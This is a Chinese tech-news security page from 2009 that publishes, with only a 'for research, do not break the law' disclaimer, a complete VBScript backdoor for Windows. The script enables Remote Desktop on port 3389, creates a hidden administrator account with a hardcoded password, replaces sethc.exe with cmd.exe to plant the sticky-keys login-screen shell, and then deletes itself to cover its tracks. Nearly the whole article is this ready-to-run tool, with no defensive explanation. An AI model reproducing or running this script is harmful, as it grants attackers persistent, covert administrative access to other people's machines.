科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道网络安全可自删除开启3389创建用户粘滞键后门的vbs

可自删除开启3389创建用户粘滞键后门的vbs

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

  开启3389创建用户粘滞键后门,作研究使用,请勿违法

来源:赛迪网 2009年10月12日

关键字: 黑客 后门

  • 评论
  • 分享微博
  • 分享邮件

  开启3389创建用户粘滞键后门,作研究使用,请勿违法

  on error resume next

  const HKEY_LOCAL_MACHINE = &H80000002

  strComputer = "."

  Set StdOut = WScript.StdOut

  Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_

  strComputer & "\root\default:StdRegProv")

  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

  strValueName = "fDenyTSConnections"

  dwValue = 0

  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

  strValueName = "PortNumber"

  dwValue = 3389

  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

  strValueName = "PortNumber"

  dwValue = 3389

  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

  on error resume next

  dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="wykgif":password="wykgif123456":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath

  On Error Resume Next

  Dim obj, success

  Set obj = CreateObject("WScript.Shell")

  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

  CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

    • 评论
    • 分享微博
    • 分享邮件
    VIP专区
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章

    业界热点:

    北京第二十六维信息技术有限公司(至顶网)版权所有. 京ICP备15039648号-7 京ICP证161336号 京公网安备 11010802021500号